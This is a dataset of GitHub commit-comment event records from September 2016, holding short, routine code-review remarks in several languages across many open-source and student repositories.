{"id":"4551590767","type":"CommitCommentEvent","actor":{"login":"shamasis"},"repo":{"name":"postmanlabs/postman-collection"},"payload":{"comment":{"id":18990880,"position":4,"line":54,"path":"test/functional/response.test.js","commit_id":"3560353cf57ee8fe289c6c72512df68b0db2fddd","created_at":"2016-09-12T20:12:15Z","updated_at":"2016-09-12T20:12:15Z","body":"These tests are already merged in develop. Right? Then why are they showing up here?"}},"created_at":"2016-09-12T20:12:15Z"}
{"id":"4551595639","type":"CommitCommentEvent","actor":{"login":"kaganjd"},"repo":{"name":"processing/p5.js-web-editor"},"payload":{"comment":{"id":18990890,"position":null,"line":null,"path":null,"commit_id":"00c979a763ee216e144cf8253e19a676793fa612","created_at":"2016-09-12T20:13:09Z","updated_at":"2016-09-12T20:13:09Z","body":"Wellll... I'm running into a few things and I'm not sure what I'm missing here. Would you mind checking out my keydown code in this [gist](https://gist.github.com/kaganjd/e9ccdf726e795402792c670086cf3f8f)? \r\n\r\nI don't see any errors in the console, but ⌘ + Enter and ⌘ + Shift + Enter don't run/stop the sketch; they just create a new line.\r\n\r\nMaybe related: when I test ⌘ + s, I get the expected message in the console—`about to save project`—but then my server crashes. I get this error: `[nodemon] app crashed - waiting for file changes before starting...` I googled the error and it seems like it may have to do with async something something. I was wondering if you'd run into this or if I just have MongoDB configured incorrectly?"}},"created_at":"2016-09-12T20:13:09Z"}
{"id":"4551604824","type":"CommitCommentEvent","actor":{"login":"soyerr"},"repo":{"name":"jbb-project/jbb"},"payload":{"comment":{"id":18990918,"position":null,"line":null,"path":null,"commit_id":"1f3f367d0dab83ba96469f81fbb080e75269ae33","created_at":"2016-09-12T20:14:48Z","updated_at":"2016-09-12T20:14:48Z","body":"Well done Bartek"}},"created_at":"2016-09-12T20:14:48Z"}
{"id":"4551607764","type":"CommitCommentEvent","actor":{"login":"ngergo"},"repo":{"name":"ngergo/ratatoskr"},"payload":{"comment":{"id":18990923,"position":null,"line":null,"path":null,"commit_id":"799372e1d41d4a390a63cad5a73b42018915f3a8","created_at":"2016-09-12T20:15:21Z","updated_at":"2016-09-12T20:15:21Z","body":"Let's see... Making authorizer an initial parameter of `OperationWrapper` would result: \r\n* all the children classes should implement getting and setting this parameter (in `__init__`), regardless the inner representation of storing the authorizer object\r\n* subclasses of `OperationWrapper` would have the responsibility to set *default* authorizer, `NoAuthorizer` could be overwritten (that wouldnt be nice)\r\n*  `@register_operation` now can get `class` and `object` as a parameter. It would make the instantiation of the `OperationWrapper` more complex. \r\n*  checking and validating the Authorizer could be overwritten in subclasses\r\n\r\n_Sum up_: `OperationWrapper` and `Authorizer` should be ortogonal to each other. *Later `OperationWrapper` could have something `before_call_hook` and `on_success_hook`, `on_failure_hook` that could accept callable objects like `Authorizer` and others...*\r\n\r\nOtherwise, we agree this is not the best solution possible... "}},"created_at":"2016-09-12T20:15:21Z"}
{"id":"4551608424","type":"CommitCommentEvent","actor":{"login":"dice4x4"},"repo":{"name":"symfony/symfony"},"payload":{"comment":{"id":18990924,"position":null,"line":null,"path":null,"commit_id":"8693611b12d4e08144d04eae1bc56cf947be148a","created_at":"2016-09-12T20:15:26Z","updated_at":"2016-09-12T20:15:26Z","body":"In PR title you say \"before is_subclass_of\" but in code you check it after. What's wrong?"}},"created_at":"2016-09-12T20:15:26Z"}
{"id":"4551610680","type":"CommitCommentEvent","actor":{"login":"pranaygp"},"repo":{"name":"sarcadass/granim.js"},"payload":{"comment":{"id":18990934,"position":5,"line":14,"path":"CONTRIBUTING.md","commit_id":"393cd928e535a51fbc72175bb8da849e9a38aff1","created_at":"2016-09-12T20:15:51Z","updated_at":"2016-09-12T20:15:51Z","body":"This should be `built`, not `builded`"}},"created_at":"2016-09-12T20:15:51Z"}
{"id":"4551614067","type":"CommitCommentEvent","actor":{"login":"pranaygp"},"repo":{"name":"sarcadass/granim.js"},"payload":{"comment":{"id":18990942,"position":14,"line":23,"path":"CONTRIBUTING.md","commit_id":"393cd928e535a51fbc72175bb8da849e9a38aff1","created_at":"2016-09-12T20:16:28Z","updated_at":"2016-09-12T20:16:28Z","body":"This should be `built` not `builded`"}},"created_at":"2016-09-12T20:16:28Z"}
{"id":"4551616631","type":"CommitCommentEvent","actor":{"login":"rtholmes"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18990947,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-12T20:16:55Z","updated_at":"2016-09-12T20:16:55Z","body":"@CPSC310Bot \r\n"}},"created_at":"2016-09-12T20:16:55Z"}
{"id":"4551616854","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18990948,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-12T20:16:57Z","updated_at":"2016-09-12T20:16:57Z","body":"Request cannot be processed; not registered."}},"created_at":"2016-09-12T20:16:57Z"}
{"id":"4551619897","type":"CommitCommentEvent","actor":{"login":"rudybrian"},"repo":{"name":"FalconChristmas/fpp"},"payload":{"comment":{"id":18990958,"position":31,"line":338,"path":"src/Makefile","commit_id":"3a1ee511a5decb7681b857ae45c7aa2ab034c45a","created_at":"2016-09-12T20:17:27Z","updated_at":"2016-09-12T20:17:27Z","body":"@cpinkham this doesn't appear to be working as there is no ../lib/librgbmatrix.so being created (which is causing fppd to fail to start due to the missing library)\r\n\r\nShould this be\r\n`ln -s ../lib/librgbmatrix_Standard.so ../lib/librgbmatrix.so`\r\ninstead?"}},"created_at":"2016-09-12T20:17:27Z"}
{"id":"4551622912","type":"CommitCommentEvent","actor":{"login":"DJYK"},"repo":{"name":"DJYK/CSE-232-Projects"},"payload":{"comment":{"id":18990968,"position":null,"line":null,"path":null,"commit_id":"a81c0c45ba0c48e0a8520d72455368511dc1e3a9","created_at":"2016-09-12T20:17:58Z","updated_at":"2016-09-12T20:17:58Z","body":"Text buffer with dynamically allocated memory."}},"created_at":"2016-09-12T20:17:58Z"}
{"id":"4551627082","type":"CommitCommentEvent","actor":{"login":"shravan-rams"},"repo":{"name":"shravan-rams/dataschool_ml"},"payload":{"comment":{"id":18990975,"position":1,"line":1,"path":"testPythonFirst.py","commit_id":"af3b30d6d5ea1f3c92629642c53f278e248845d2","created_at":"2016-09-12T20:18:42Z","updated_at":"2016-09-12T20:18:42Z","body":"testing in github web changing name"}},"created_at":"2016-09-12T20:18:42Z"}
{"id":"4551628142","type":"CommitCommentEvent","actor":{"login":"westonruter"},"repo":{"name":"xwp/wordpress-develop"},"payload":{"comment":{"id":18990978,"position":11,"line":1412,"path":"src/wp-includes/theme.php","commit_id":"807fc302dd0a044b71970c1b80288393e0bad66a","created_at":"2016-09-12T20:18:54Z","updated_at":"2016-09-12T20:18:54Z","body":"A partial can be registered with `container_inclusive` as `true` or `false`. If `false`, then the partial is expected to only render the contents of the CSS.\r\n\r\nAnd yes, selective refresh can be skipped here. No need to register a partial because you can use pure `postMessage` to inject the CSS as-is into the `style` element."}},"created_at":"2016-09-12T20:18:54Z"}
{"id":"4551632476","type":"CommitCommentEvent","actor":{"login":"MatrixFrog"},"repo":{"name":"google/closure-compiler-js"},"payload":{"comment":{"id":18990990,"position":null,"line":null,"path":null,"commit_id":"a557c78186f0aeb2e6600854f0a3c919fd1417f0","created_at":"2016-09-12T20:19:38Z","updated_at":"2016-09-12T20:19:38Z","body":"It's not generally expected that there will be a new push to npm after every commit. This project will usually be pushed to npm according to the Closure Compiler release schedule, which is about once a month."}},"created_at":"2016-09-12T20:19:38Z"}
{"id":"4551633048","type":"CommitCommentEvent","actor":{"login":"KristineWolf"},"repo":{"name":"KristineWolf/Eventastic"},"payload":{"comment":{"id":18990993,"position":null,"line":null,"path":null,"commit_id":"c089d4145814fe27fec46b4940f2b724ecc425a6","created_at":"2016-09-12T20:19:45Z","updated_at":"2016-09-12T20:19:45Z","body":"ich hab jetzt mal deine Vorlagen beendet, ich weiß nicht was du noch machen wolltest\r\n\r\naber ich glaube small screens ist für uhren also das Gerät sieht wie eine Uhr aus"}},"created_at":"2016-09-12T20:19:45Z"}
{"id":"4551634971","type":"CommitCommentEvent","actor":{"login":"westonruter"},"repo":{"name":"xwp/wordpress-develop"},"payload":{"comment":{"id":18991002,"position":11,"line":1412,"path":"src/wp-includes/theme.php","commit_id":"807fc302dd0a044b71970c1b80288393e0bad66a","created_at":"2016-09-12T20:20:05Z","updated_at":"2016-09-12T20:20:05Z","body":"So:\r\n\r\n> This needs an `|| is_customize_preview()` for selective refresh to work.\r\n\r\nIs for selective refresh _or_ updating just via JS directly. There needs to be an element output that can be targeted in either case."}},"created_at":"2016-09-12T20:20:05Z"}
{"id":"4551635067","type":"CommitCommentEvent","actor":{"login":"wan54"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":18991001,"position":null,"line":null,"path":null,"commit_id":"18d6d85320cfc20605219bbcfa7ff27b57528a53","created_at":"2016-09-12T20:20:04Z","updated_at":"2016-09-12T20:20:04Z","body":"Worked the first time I ran UIExplorer on the phone, but not subsequently. No problems running on the simulator."}},"created_at":"2016-09-12T20:20:04Z"}
{"id":"4551637312","type":"CommitCommentEvent","actor":{"login":"vinicius-vollrath"},"repo":{"name":"Pronatec-Unit/KeD-Zs-Filmes-e-Series"},"payload":{"comment":{"id":18991004,"position":null,"line":null,"path":null,"commit_id":"c48cdbeafac245f8b00e84a2dfb18950222fe3ee","created_at":"2016-09-12T20:20:29Z","updated_at":"2016-09-12T20:20:29Z","body":"Cadê as telas?"}},"created_at":"2016-09-12T20:20:29Z"}
{"id":"4551639809","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"EkaSe/HelloWorld"},"payload":{"comment":{"id":18991013,"position":4,"line":5,"path":"HelloWorld/Program.cs","commit_id":"cd1de5be6f6418f3cf407150f3d093fb4237ad1d","created_at":"2016-09-12T20:20:55Z","updated_at":"2016-09-12T20:20:55Z","body":"Ну я же говорил, что имена классов - это ПаскальНотация)"}},"created_at":"2016-09-12T20:20:55Z"}
{"id":"4551640050","type":"CommitCommentEvent","actor":{"login":"xiGUAwanOU"},"repo":{"name":"YuKitAs/battle-of-elements"},"payload":{"comment":{"id":18991014,"position":26,"line":26,"path":"src/test/java/xigua/battle/of/elements/model/battle/magic/MagicTest.java","commit_id":"ac89e402740ed65315c30e6b7f748554469d2573","created_at":"2016-09-12T20:20:58Z","updated_at":"2016-09-12T20:20:58Z","body":"正确的方法名格式应当是`测试的内容_期待的结果()`。"}},"created_at":"2016-09-12T20:20:58Z"}
{"id":"4551640235","type":"CommitCommentEvent","actor":{"login":"CCWnAustin"},"repo":{"name":"CCWnAustin/TestRepository"},"payload":{"comment":{"id":18991015,"position":null,"line":null,"path":null,"commit_id":"4164e0d37d25d3954e9bcbc236b20bbf996768e3","created_at":"2016-09-12T20:21:00Z","updated_at":"2016-09-12T20:21:00Z","body":"This is a test. Just trying things out in GitHub"}},"created_at":"2016-09-12T20:21:00Z"}
{"id":"4551641354","type":"CommitCommentEvent","actor":{"login":"DJYK"},"repo":{"name":"DJYK/CSE-232-Projects"},"payload":{"comment":{"id":18991017,"position":1,"line":1,"path":"Project_10/Description","commit_id":"a81c0c45ba0c48e0a8520d72455368511dc1e3a9","created_at":"2016-09-12T20:21:13Z","updated_at":"2016-09-12T20:21:13Z","body":"Text buffer with dynamically allocated memory."}},"created_at":"2016-09-12T20:21:13Z"}
{"id":"4551644124","type":"CommitCommentEvent","actor":{"login":"Catzenjaeger"},"repo":{"name":"php-fusion/PHP-Fusion"},"payload":{"comment":{"id":18991023,"position":null,"line":null,"path":null,"commit_id":"470c342dd2dbf9748ef3b5fd11d12b1b1f8bf0e6","created_at":"2016-09-12T20:21:39Z","updated_at":"2016-09-12T20:21:39Z","body":"WOW - But what does this mean for existing installations (e.g. my own PHP F 9 Site)"}},"created_at":"2016-09-12T20:21:39Z"}
{"id":"4551644392","type":"CommitCommentEvent","actor":{"login":"matklad"},"repo":{"name":"intellij-rust/intellij-rust"},"payload":{"comment":{"id":18991025,"position":null,"line":null,"path":null,"commit_id":"e8f41e0565f610b1b30dd4aab8f13230a373f1e1","created_at":"2016-09-12T20:21:42Z","updated_at":"2016-09-12T20:21:42Z","body":"We had exactly the same bug with `getCrateRootFor` function, and there is a test for that. I want to refactor this such that there is no duplication between this `canonicalCratePath` and `getCrateRootFor`. Existing test would be enough then."}},"created_at":"2016-09-12T20:21:42Z"}
{"id":"4551646894","type":"CommitCommentEvent","actor":{"login":"flaviodamaiajr"},"repo":{"name":"sendgrid/docs"},"payload":{"comment":{"id":18991030,"position":null,"line":null,"path":null,"commit_id":"4179e7bdca7727ee16c59100e971abf906bb5045","created_at":"2016-09-12T20:22:10Z","updated_at":"2016-09-12T20:22:10Z","body":"It's not necessary convert to Int32. Convert only if the parameter received be a numeric string type."}},"created_at":"2016-09-12T20:22:10Z"}
{"id":"4551655788","type":"CommitCommentEvent","actor":{"login":"betrue-final-final"},"repo":{"name":"OfficeDev/office-ui-fabric-js"},"payload":{"comment":{"id":18991075,"position":null,"line":null,"path":null,"commit_id":"7f0825f7b9f7893a9098cdd73e17f39a2783344d","created_at":"2016-09-12T20:23:40Z","updated_at":"2016-09-12T20:23:40Z","body":"Not completely sure if the control has a true \"error\" state or it just feeds the content into it."}},"created_at":"2016-09-12T20:23:40Z"}
{"id":"4551660335","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"mcostalba/Stockfish"},"payload":{"comment":{"id":18991085,"position":null,"line":null,"path":null,"commit_id":"ad7d2bdeedd2b0021e459297f3ddeaf6f8e07d87","created_at":"2016-09-12T20:24:26Z","updated_at":"2016-09-12T20:24:26Z","body":"@pb00068 \r\nI suppose you mean \"...we might exploit si->**pinnersForKing** for evaluation. Following test failed with positive score although it had to fight against the trade-off of introducing si->**pinnersForKing**\" \r\n\r\nWhich be renamed to \"spidersForKing\" after Alain's proposal, by the way (see https://github.com/official-stockfish/Stockfish/pull/798)"}},"created_at":"2016-09-12T20:24:26Z"}
{"id":"4551669749","type":"CommitCommentEvent","actor":{"login":"squeek502"},"repo":{"name":"plorry/VegAssist"},"payload":{"comment":{"id":18991107,"position":null,"line":null,"path":null,"commit_id":"fe86048b72a5fd718a2cf3c979de514c2ef418fc","created_at":"2016-09-12T20:26:11Z","updated_at":"2016-09-12T20:26:11Z","body":"Did you mean to commit this to a separate branch?"}},"created_at":"2016-09-12T20:26:11Z"}
{"id":"4551672115","type":"CommitCommentEvent","actor":{"login":"matklad"},"repo":{"name":"intellij-rust/intellij-rust"},"payload":{"comment":{"id":18991115,"position":5,"line":18,"path":"src/main/kotlin/org/rust/lang/core/psi/impl/RustStubbedElementImpl.kt","commit_id":"8f02d6b5ab4756941cfcc636160dd540975eb54e","created_at":"2016-09-12T20:26:36Z","updated_at":"2016-09-12T20:26:36Z","body":"Yes, I did verified this. \r\n\r\nIt would be bizarre if this was broken, because it is exactly the default implementation of this method. "}},"created_at":"2016-09-12T20:26:36Z"}
{"id":"4551672461","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"EkaSe/HelloWorld"},"payload":{"comment":{"id":18991117,"position":6,"line":7,"path":"HelloWorld/Program.cs","commit_id":"cd1de5be6f6418f3cf407150f3d093fb4237ad1d","created_at":"2016-09-12T20:26:40Z","updated_at":"2016-09-12T20:26:40Z","body":"Для публичных полей также используется ПаскальНотация, так что верно, что с заглавной буквы, но правильней вот так: XPoint - это  если чисто орфографически подходить. А если  по смыслу: почему в названии координаты фигурирует point? Это ж и так название класса. Мы же не говорим, что двухмерная точка состоит из x-точки и y-точки? (кря-кря)))) Если называть развёрнуто, это это x-координата и y-координата, соответственно XCoordinate и YCoordinate. Но в данном случае чувство вкуса мне подсказывает, лучше всего назвать поля просто X и Y. Всё коротко и ясно. Вот так)"}},"created_at":"2016-09-12T20:26:40Z"}
{"id":"4551673898","type":"CommitCommentEvent","actor":{"login":"bartavelle"},"repo":{"name":"bartavelle/language-puppet"},"payload":{"comment":{"id":18991119,"position":null,"line":null,"path":null,"commit_id":"294df629ccfb1f9cbf66107d8d2e2f46be3c663f","created_at":"2016-09-12T20:26:54Z","updated_at":"2016-09-12T20:26:54Z","body":"It was just a bounds upgrade, but I didn't update the changelog :/\r\n\r\n3 digits is perfect though."}},"created_at":"2016-09-12T20:26:54Z"}
{"id":"4551674996","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":18991123,"position":null,"line":null,"path":null,"commit_id":"fbfb116efaaacf5ed0c838fb832cde5904988dae","created_at":"2016-09-12T20:27:06Z","updated_at":"2016-09-12T20:27:06Z","body":"The following doc(s) have been deployed to the [peterpanth](https://peterpanth-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/aws-s3-drupal](https://peterpanth-static-docs.pantheonsite.io/docs/aws-s3-drupal)\n- [docs/content-delivery-network](https://peterpanth-static-docs.pantheonsite.io/docs/content-delivery-network)\n- [docs/drupal-s3](https://peterpanth-static-docs.pantheonsite.io/docs/drupal-s3)\n- [docs/wordpress-cloudfront](https://peterpanth-static-docs.pantheonsite.io/docs/wordpress-cloudfront)\n"}},"created_at":"2016-09-12T20:27:06Z"}
{"id":"4551675227","type":"CommitCommentEvent","actor":{"login":"coco-napky"},"repo":{"name":"SapienciaBendecidos/fe-bendecidos"},"payload":{"comment":{"id":18991125,"position":2,"line":2,"path":"app/views/login.html","commit_id":"8abc7d89c666cd86c8a3bd7aa02221c00dd2de37","created_at":"2016-09-12T20:27:09Z","updated_at":"2016-09-12T20:27:09Z","body":"Es mejor si bajas el logo y la hosteamos nosotros, asi no dependemos del servidor de ellos"}},"created_at":"2016-09-12T20:27:09Z"}
{"id":"4551676434","type":"CommitCommentEvent","actor":{"login":"mossprescott"},"repo":{"name":"mossprescott/quasar"},"payload":{"comment":{"id":18991129,"position":15,"line":85,"path":"mongodb/src/main/scala/quasar/physical/mongodb/workflow/package.scala","commit_id":"ac09b920419b658ca38ac66cf8621413740a7e2b","created_at":"2016-09-12T20:27:21Z","updated_at":"2016-09-12T20:27:21Z","body":"*Really* wish I had thought of that. Indeed, ascribing the type fixes it, with or without the use of the synthesized `apply`.\r\n\r\nThank you, @paulp!"}},"created_at":"2016-09-12T20:27:21Z"}
{"id":"4551677017","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":18991133,"position":null,"line":null,"path":null,"commit_id":"7762d4bd6d0e93ee86c82a2580f2373475af18e6","created_at":"2016-09-12T20:27:27Z","updated_at":"2016-09-12T20:27:27Z","body":"The following doc(s) have been deployed to the [peterpanth](https://peterpanth-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/aws-s3-drupal](https://peterpanth-static-docs.pantheonsite.io/docs/aws-s3-drupal)\n- [docs/content-delivery-network](https://peterpanth-static-docs.pantheonsite.io/docs/content-delivery-network)\n- [docs/drupal-s3](https://peterpanth-static-docs.pantheonsite.io/docs/drupal-s3)\n- [docs/wordpress-cloudfront](https://peterpanth-static-docs.pantheonsite.io/docs/wordpress-cloudfront)\n- [app/config/sculpin_site.yml](https://github.com/pantheon-systems/documentation/commit/7762d4bd6d0e93ee86c82a2580f2373475af18e6/app/config/sculpin_site.yml)\n"}},"created_at":"2016-09-12T20:27:27Z"}
{"id":"4551680083","type":"CommitCommentEvent","actor":{"login":"hannes14"},"repo":{"name":"Singular/Sources"},"payload":{"comment":{"id":18991138,"position":null,"line":null,"path":null,"commit_id":"58543e3f682941d3b62b869286d766749a9a385b","created_at":"2016-09-12T20:28:00Z","updated_at":"2016-09-12T20:28:00Z","body":"On Mon, Sep 12, 2016 at 01:06:30PM -0700, François Bissey wrote:\n>    Looks like you merged configure.ac with omalloc.pc.in.\nYes (and with Makefile.am), but it is fixed.\n"}},"created_at":"2016-09-12T20:28:00Z"}
{"id":"4551681911","type":"CommitCommentEvent","actor":{"login":"jackpoz"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18991143,"position":53,"line":118,"path":"src/server/scripts/Northrend/VaultOfArchavon/instance_vault_of_archavon.cpp","commit_id":"fab78d5e02ddaab3e4cfeee5ffb9b00f882be248","created_at":"2016-09-12T20:28:21Z","updated_at":"2016-09-12T20:28:21Z","body":"weird to see a \\ at the end of line like that"}},"created_at":"2016-09-12T20:28:21Z"}
{"id":"4551682214","type":"CommitCommentEvent","actor":{"login":"coco-napky"},"repo":{"name":"SapienciaBendecidos/fe-bendecidos"},"payload":{"comment":{"id":18991146,"position":41,"line":41,"path":"app/views/login.html","commit_id":"8abc7d89c666cd86c8a3bd7aa02221c00dd2de37","created_at":"2016-09-12T20:28:24Z","updated_at":"2016-09-12T20:28:24Z","body":"No es necesario agregar los js de materialize.  ya vienen en el set up"}},"created_at":"2016-09-12T20:28:24Z"}
{"id":"4551684029","type":"CommitCommentEvent","actor":{"login":"nmschulte"},"repo":{"name":"i3/i3"},"payload":{"comment":{"id":18991153,"position":15,"line":407,"path":"src/bindings.c","commit_id":"41ce596a943713d0000ed7914f7058d72a55afc2","created_at":"2016-09-12T20:28:45Z","updated_at":"2016-09-12T20:28:45Z","body":"This could be optimized a bit; I'm not sure which case is the likely/most common one (that the `sym_numlock` or `sym_numlock_no_shift` will match `resolving->keysym`), but we could avoid a call to `xkb_state_key_get_one_sym` in that case w/ a simple nested condition or other conditional expr."}},"created_at":"2016-09-12T20:28:45Z"}
{"id":"4551687540","type":"CommitCommentEvent","actor":{"login":"matklad"},"repo":{"name":"intellij-rust/intellij-rust"},"payload":{"comment":{"id":18991161,"position":14,"line":44,"path":"src/test/kotlin/org/rust/lang/core/stubs/RustStubAccessTest.kt","commit_id":"8f02d6b5ab4756941cfcc636160dd540975eb54e","created_at":"2016-09-12T20:29:24Z","updated_at":"2016-09-12T20:29:24Z","body":"The property tested is pretty simple: \"For every stub based element, `getParent` should return the same result when PSI is backed by stubs and when PSI is backed by AST\".\r\n\r\nBut the test itself is not very good, because you have to avoid actually loading the AST and have to hard code the cases where `getParent` works for stubs :( Still, I think this test is useful, and would be even more when we switch more elements to stub based `getParent`."}},"created_at":"2016-09-12T20:29:24Z"}
{"id":"4551689815","type":"CommitCommentEvent","actor":{"login":"stapelberg"},"repo":{"name":"i3/i3"},"payload":{"comment":{"id":18991172,"position":15,"line":407,"path":"src/bindings.c","commit_id":"41ce596a943713d0000ed7914f7058d72a55afc2","created_at":"2016-09-12T20:29:50Z","updated_at":"2016-09-12T20:29:50Z","body":"Already done in commit 555f458d7ad4d1e558747669fd2d2036ffead1ee"}},"created_at":"2016-09-12T20:29:50Z"}
{"id":"4551691511","type":"CommitCommentEvent","actor":{"login":"kaiksales"},"repo":{"name":"Pronatec-Unit/KeD-Zs-Filmes-e-Series"},"payload":{"comment":{"id":18991176,"position":null,"line":null,"path":null,"commit_id":"c48cdbeafac245f8b00e84a2dfb18950222fe3ee","created_at":"2016-09-12T20:30:13Z","updated_at":"2016-09-12T20:30:13Z","body":"Professor, ainda não aprendemos a enviar direito não , só Zelita, estamos tentando aprender  para realizar o processo de envio.\n\n\n________________________________\nDe: Vinicius Vollrath <notifications@github.com>\nEnviado: segunda-feira, 12 de setembro de 2016 18:20\nPara: Pronatec-Unit/KeD-Zs-Filmes-e-Series\nAssunto: Re: [Pronatec-Unit/KeD-Zs-Filmes-e-Series] Atualização da data de entrega das telas (c48cdbe)\n\n\nCadê as telas?\n\n-\nYou are receiving this because you are subscribed to this thread.\nReply to this email directly, view it on GitHub<https://github.com/Pronatec-Unit/KeD-Zs-Filmes-e-Series/commit/c48cdbeafac245f8b00e84a2dfb18950222fe3ee#commitcomment-18991004>, or mute the thread<https://github.com/notifications/unsubscribe-auth/ARFRRPzTOJCeVvou51Z-GBgQxG3Tlg7vks5qpbQOgaJpZM4J6_PL>.\n"}},"created_at":"2016-09-12T20:30:13Z"}
{"id":"4551693365","type":"CommitCommentEvent","actor":{"login":"YuKitAs"},"repo":{"name":"YuKitAs/battle-of-elements"},"payload":{"comment":{"id":18991185,"position":26,"line":26,"path":"src/test/java/xigua/battle/of/elements/model/battle/magic/MagicTest.java","commit_id":"ac89e402740ed65315c30e6b7f748554469d2573","created_at":"2016-09-12T20:30:31Z","updated_at":"2016-09-12T20:30:31Z","body":"fixed."}},"created_at":"2016-09-12T20:30:31Z"}
{"id":"4551700356","type":"CommitCommentEvent","actor":{"login":"markkrueg"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18991206,"position":null,"line":null,"path":null,"commit_id":"a912c9a2658dbbf8321d5d063d63cf673825106c","created_at":"2016-09-12T20:31:47Z","updated_at":"2016-09-12T20:31:47Z","body":"What is the difference between a \"custom version\" and a \"fork\"? I'm genuinely curious.\r\n\r\nDoes this have to do with how the fork originally occurred; that it was somehow done improperly within github?"}},"created_at":"2016-09-12T20:31:47Z"}
{"id":"4551700928","type":"CommitCommentEvent","actor":{"login":"nmschulte"},"repo":{"name":"i3/i3"},"payload":{"comment":{"id":18991207,"position":15,"line":407,"path":"src/bindings.c","commit_id":"41ce596a943713d0000ed7914f7058d72a55afc2","created_at":"2016-09-12T20:31:54Z","updated_at":"2016-09-12T20:31:54Z","body":"Awesome.  I keep doing this (not seeing the latest change) because I'm viewing via GitHub interface; no `gitk`.  Thanks again for fixing all of this!"}},"created_at":"2016-09-12T20:31:54Z"}
{"id":"4551710816","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18991238,"position":null,"line":null,"path":null,"commit_id":"a912c9a2658dbbf8321d5d063d63cf673825106c","created_at":"2016-09-12T20:33:40Z","updated_at":"2016-09-12T20:33:40Z","body":"@markkrueg Simple. Look at the commit history of PocketMine-MP in comparison to Genisys'. There are no common commits, and this repository is not a fork. It's a copy."}},"created_at":"2016-09-12T20:33:40Z"}
{"id":"4551719314","type":"CommitCommentEvent","actor":{"login":"rlrossiter"},"repo":{"name":"ctrath/ursula-cli"},"payload":{"comment":{"id":18991265,"position":31,"line":455,"path":"ursula_cli/shell.py","commit_id":"c1d8cc8b8c87f4dabf3e000be1f0952f66e551b4","created_at":"2016-09-12T20:35:17Z","updated_at":"2016-09-12T20:35:17Z","body":"You should use the `with` syntax here for the file management."}},"created_at":"2016-09-12T20:35:17Z"}
{"id":"4551720875","type":"CommitCommentEvent","actor":{"login":"Atcold"},"repo":{"name":"torch/torch.github.io"},"payload":{"comment":{"id":18991269,"position":228,"line":338,"path":"docs/02-developer-docs.md","commit_id":"332996dad30f92cc7f67206fb46cc66215d0e03d","created_at":"2016-09-12T20:35:33Z","updated_at":"2016-09-12T20:35:33Z","body":"Both of these links are broken. Where shall I add the new definition?"}},"created_at":"2016-09-12T20:35:33Z"}
{"id":"4551720984","type":"CommitCommentEvent","actor":{"login":"wmelani"},"repo":{"name":"wmelani/tsUnit"},"payload":{"comment":{"id":18991270,"position":null,"line":null,"path":null,"commit_id":"1fe8c4fda96789ca35495f8f757daad5881b4716","created_at":"2016-09-12T20:35:34Z","updated_at":"2016-09-12T20:35:34Z","body":"Sure - can you republish the npm module? :)"}},"created_at":"2016-09-12T20:35:34Z"}
{"id":"4551721452","type":"CommitCommentEvent","actor":{"login":"rlrossiter"},"repo":{"name":"ctrath/ursula-cli"},"payload":{"comment":{"id":18991272,"position":68,"line":539,"path":"ursula_cli/shell.py","commit_id":"c1d8cc8b8c87f4dabf3e000be1f0952f66e551b4","created_at":"2016-09-12T20:35:40Z","updated_at":"2016-09-12T20:35:40Z","body":"You're missing a quote here"}},"created_at":"2016-09-12T20:35:40Z"}
{"id":"4551722803","type":"CommitCommentEvent","actor":{"login":"Wohlstand"},"repo":{"name":"Wohlhabend-Networks/PGE-Project"},"payload":{"comment":{"id":18991274,"position":80,"line":0,"path":"Editor/editing/_components/history/history_manager.h","commit_id":"a08d09e5669e729bfed27f0d23c1ce6ba72d5abd","created_at":"2016-09-12T20:35:55Z","updated_at":"2016-09-12T20:35:55Z","body":"minimal size of history"}},"created_at":"2016-09-12T20:35:55Z"}
{"id":"4551726458","type":"CommitCommentEvent","actor":{"login":"PierreR"},"repo":{"name":"bartavelle/language-puppet"},"payload":{"comment":{"id":18991283,"position":null,"line":null,"path":null,"commit_id":"294df629ccfb1f9cbf66107d8d2e2f46be3c663f","created_at":"2016-09-12T20:36:36Z","updated_at":"2016-09-12T20:36:36Z","body":"Even as a minor upgrade, it is actually going to be handy for me. I am usually following the latest `hydra` build (to benefit from the cache) for nixos and have had to patch a manifest because of the missing `validate_integer` ;-)"}},"created_at":"2016-09-12T20:36:36Z"}
{"id":"4551726915","type":"CommitCommentEvent","actor":{"login":"rlrossiter"},"repo":{"name":"ctrath/ursula-cli"},"payload":{"comment":{"id":18991285,"position":80,"line":551,"path":"ursula_cli/shell.py","commit_id":"c1d8cc8b8c87f4dabf3e000be1f0952f66e551b4","created_at":"2016-09-12T20:36:40Z","updated_at":"2016-09-12T20:36:40Z","body":"You don't close the file here, you'll need to do:\r\n\r\n```\r\nwith open(vm_config_file) as config:\r\n    yaml.load(config)\r\n```"}},"created_at":"2016-09-12T20:36:40Z"}
{"id":"4551727193","type":"CommitCommentEvent","actor":{"login":"tgabi333"},"repo":{"name":"hwi/HWIOAuthBundle"},"payload":{"comment":{"id":18991286,"position":null,"line":null,"path":null,"commit_id":"0c7abffa1cf47a8e33733837b94495b629a424c1","created_at":"2016-09-12T20:36:44Z","updated_at":"2016-09-12T20:36:44Z","body":"Thank You!!! :)"}},"created_at":"2016-09-12T20:36:44Z"}
